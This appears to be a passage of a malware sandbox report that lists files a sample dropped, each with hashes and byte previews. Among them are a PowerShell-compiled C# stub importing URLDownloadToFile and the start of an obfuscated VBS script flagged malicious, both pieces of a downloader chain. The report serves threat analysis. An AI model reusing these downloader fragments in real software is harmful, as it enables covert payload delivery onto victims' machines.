SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5A87.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8517407251719497
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO4wxeHChWEE1:TeAFawNLopFgU10XJBOaT3
MD5:	D0962B221779A756754334848DCFF184
SHA1:	22CD3B9D687216E6921553F55958449CE7ABF05D
SHA-256:	7BA5110096912E6B352060FFF79B07EA95CA114A13D3994D7814831DFAA649B8
SHA-512:	05AFC25BA53913F0685075B6EC27A2A416168CB7A6D5C869D2F3DBA06AAD88633F1A709DD51AA1EDC946FF74E6271D9D3A5652FE4E0B8F226A452FDF6BAED36F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5BA1.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1368932887859682
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
MD5:	9A534FD57BED1D3E9815232E05CCF696
SHA1:	916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
SHA-256:	7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
SHA-512:	ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5D77.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5E14.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5E92.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES611F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Oct 23 07:38:03 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.95917910146405
Encrypted:	false
SSDEEP:	24:HJe9ERok2qHnwKjmfwI+ycuZhNhakSfPNnqSqd:Ek2qQKjmo1ulha39qSK
MD5:	7EB903B5CEBF8DD40C3E630C7DEC2A4B
SHA1:	0C596A63C68B4AF202F6F2ECDC914D59D44625B4
SHA-256:	37241F18F23969FC0E8E757BBD90FB23FE419F04BCEFE8F98B814577FA37C24F
SHA-512:	17804DB2AA8319E6EDC38896D26AF78E849DEC37C3AC6B7C69E32D667D254226979A2DCB8766454897CCF031CA6FF22286AE69914D58CA970DDD7339D832A1F1
Malicious:	false
Preview:	L.....g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP..................-.U..a..a.5.,.S..........3.......C:\Users\user\AppData\Local\Temp\RES611F.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.r.s.0.m.l.o.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1a2xbzub.fs5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wkgys4a.kmv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ebieuw0.dlj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpuuo5cn.rgw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igetc4nj.bao.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnexqfau.sbv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbov4ppe.yes.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1vy1hqj.a4k.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqntpwtl.dfo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2pvhxia.ohs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.075149871547553
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySkak7YnqqRpPN5Dlq5J:+RI+ycuZhNhakSfPNnqX
MD5:	D02D0A55F8E7611593618635AF2CEE53
SHA1:	9D371E1910FA9E7BFD688D11F8FC372F090C83F0
SHA-256:	442AC4C18378AC277CD29FA166D95FD3021E6422BE7AD2C5853D5BB24873086D
SHA-512:	21768F17496E375D8ACE4B7EF28A4D031F460E5A9C91564D301E40192209C57E509B059B44CC2B7B6AF3959E4198E341B3A680244029C52D5FFCF0B3D19A0297
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.r.s.0.m.l.o.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.r.s.0.m.l.o.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
Category:	dropped
Size (bytes):	470
Entropy (8bit):	3.810012065365248
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zujNFdMYQXReKJ8SRHy4HkOlmPe/HLZ2PQy:V/DTLDfu+XfHIlePIQy
MD5:	4F57B272B8F8E24280784E2242B442A1
SHA1:	768BA6D7A969A60A51E04F6C02E892A38AD6FFFF
SHA-256:	49587487DC8B6AD4B87A341C311221FE9724D0B0F473510C0EBFB863239FFA13
SHA-512:	25B60D9A52B91C8F45165E1F0C7117A7E5FF1303DEE917EB104BB36E1E36C5A6D6E74BB3E6B124756BA6EFE6A1923DF919DE4661DDD3F15AD86A06566A202C71
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace yckzdTZwzd.{. public class r. {. [DllImport("uRlmOn.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr WRt,string wwz,string cEwjYO,uint qSypvpf,IntPtr ooPgiXcOk);.. }..}.

C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
Category:	dropped
Size (bytes):	367
Entropy (8bit):	5.202322264605034
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2Fi23fGzD9EDqzxs7+AEszIFi23fGzD9EDPn:p37Lvkmb6KoZkaWWZE3Zkar
MD5:	CA4AA7B639FA43930E2A966097A7FC03
SHA1:	48246B5DCC6475FC5B99E67F0D55973E3511AA74
SHA-256:	FECD9AA7C648B41F415A7F27E6E5EFB184C24B30DF127E120557413CB981DA41
SHA-512:	A43DF973C34E7206E51CC4EE8361B62D6987D1547A27E65A09C5FC54FD41E7D9E2D28B89C5F58415896E3A69567D9559496C6DEDBE3FE635E9BCC8365A57A862
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.0.cs"

C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.815688500283507
Encrypted:	false
SSDEEP:	24:etGSLPBG5eM7p8cM5OkA5G7cztRJDtkZfxHR2jqhkWI+ycuZhNhakSfPNnq:68sM+V5k5DtRcJxH0EH1ulha39q
MD5:	C85787E8245B86464E8D446FA3B9F3CC
SHA1:	57951A08731E43D9D8CA3F5C98149905999CBBCD
SHA-256:	02D7C2B175F5E596EEC2565D4AA2F841BC13AA7622764EFCC62EC5412A57413C
SHA-512:	53795EC43371E938C733676FD8E6EE7CBB572B5C03FC5F1C88B26EC5F8285FACC2EF63EDB6E3E59A2179A3C09A74AE3D947058852E09EED15C99F91456A8E296
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....t.....t.......................................... ;.....P ......M.........S.....W.....[.....b.....j...M.....M...!.M.....M.......!............;.......................................$..........<Module>.zr

C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
Category:	modified
Size (bytes):	864
Entropy (8bit):	5.292062077725076
Encrypted:	false
SSDEEP:	24:KYqd3ka6K4kanEJkaqKax5DqBVKVrdFAMBJTH:3ika6VkanEJkaqK2DcVKdBJj
MD5:	2B81383DEEA23F324755D952C6F8B970
SHA1:	502FCC644FEADB58F188357E890646FBD22372B5
SHA-256:	F4DBAEE72EF00FBB37187C60164F36D88685AF149C11D2BEB10E906AFDF81FB5
SHA-512:	4D77F0D44988D5C4E83801704CA7F86312865AC57233F1971C6273C8C614FAFA63E15EB2842D3928BB7E662CC1592E358818D46A38FBC712F2CD1B463836CA99
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\rvgjufs

Download File

Process:	C:\Windows\explorer.exe
File Type:	Dyalog APL version 68.-87
Category:	dropped
Size (bytes):	339146
Entropy (8bit):	7.999488540539535
Encrypted:	true
SSDEEP:	6144:NOMW7MsypwT2XUUT7xLGWieU+HwzFaXEmuaOg+jnHwKY/c+UR:27Ms2W2XUwU1pzwTu3nQ3ZUR
MD5:	533EC8E3957FEFFE8985A6EB70A3AF40
SHA1:	398207C8EC62A03B607604183E1609DBC0D69FAD
SHA-256:	6C3F55900A5BBD5824CA0DB25B0B30D23EAD3EBDDFD93723B24360D8F3370212
SHA-512:	A724B7E7DC5AE01677D0E51B624B1A1DA229641E1B090D719DA6A1B12FB4E2C56B46C7977F80B14BE9A49FD8182C993448990289B3637619A3D0D821B1CB2EB2
Malicious:	false
Preview:	..D...&.K%=aS.G.N.D..2}k.Ds./......`.~.Z&..H.&......H.B..T8.F&...C.............>........%....Z...$....}.a........Y.u..6*.[.@.<../s.F`q..^..[.8.j1...ed.j.p..t...M.}.c...p...%N..,....2C..r....MV\.i..%..B.r<...c{.XP.B?x....[..R.a......w....s.%.....y....r4.~..[...y......8.h.9.e.H..#.......'..&6Bn.K..c...xH.....p.4...')v...g>H7....:..B.<.Rh..(..-..%r..3..+J.U........z0.UH.?I{..#[...%i......z.!....{....i4k.....%...!Jj..6?...1oV..BGL.?..{.-......v'..n\...0.7.A...q^.....09.%...v...Pe)....]x...+)~#....:)..s.....Y.....h.t.g..H...#.....C..1`...lrQ.....`.N.B..>.`.c.......\......k.W..T...c....1@.2.I...=.H.....(z\.^PckR...z...Iv.......cF[....~I{."n..8...0?.x..C.A]..a=..!.1BNw.....,,.\.....g2.K-...p...s~.$....+>>...z..Z&'.Uq.z.eC.r.A..pP....M..Wj....e..^..4......~...{aE..+...J..j...R8.H..e4.F.@..c..W.....w..6..[..=.;9.q...LfT`r..(..?...{.....5..=.>j..:..... ..O.nO....!.....c_.N(.c+h..ez...JBL.6.P...i..{&......>...?..do!..p..c...u}\|..6.......e...l:

C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	140570
Entropy (8bit):	3.699365257334415
Encrypted:	false
SSDEEP:	1536:WSb0qgt5pzFGwNHijRyr0eoTozYA5qx8QeT/nJuMW2BZSp4FDIKF4Gc1IIzZWlTh:WSbNgt5pJGwNXTvclvrcZ5JIC6Vo+0
MD5:	F55A3D376DF4C84C27AC8B6337BAEAE0
SHA1:	5EA1BD3BE84FC46CC8C9741DEE373E409774CE3B
SHA-256:	65EE64591DE8A3926EB0EF9B6C668BFF0A5CCE93F0574E9D6133690BBD1FC632
SHA-512:	36000CC27AB85878F093536CD4775B7A1915A24F5733905F5D2EE1441BDD3B33E0D0B35A5F7B0E4BC9F1060BBE2D2A396663B88FF9A116E0DA1DF734BF0E689A
Malicious:	true
Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .m.a.s.c.u.l.i.n.i.d.a.d.e.)..... . . . .d.i.m. .h.y.p.o.g.l.o.s.s.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .h.y.p.o.g.l.o.s.s.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .h.y.p.o.g.l.o.s.s.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .

C:\Users\user\AppData\Roaming\wihaduv

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46112
Entropy (8bit):	6.157229331466131
Encrypted:	false
SSDEEP:	384:ENAPwxabK/7YyoodyJ8Ood0XAKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+1Pv:mYGn//oAKodAT6Iq812HSpqWJ82n
MD5:	BB8B6B54FD50C08AB579B84BF07918CF
SHA1:	3FC81B9C9FFB9A8D9BEBAB489F8C6B0938C1A711
SHA-256:	816939877FC16426EF1C32C25572BB763750FFE66A4E3FA3765543D0266E6505
SHA-512:	CE42920F15CD1167990B7A687EBCD7D832E21D45AF63E20984A234EF9C35001450B3CFE13273B2B1BE7C35BB1DA314570A74D7EEEBD7F554C6F2E91ED22F46E3
Malicious:	false
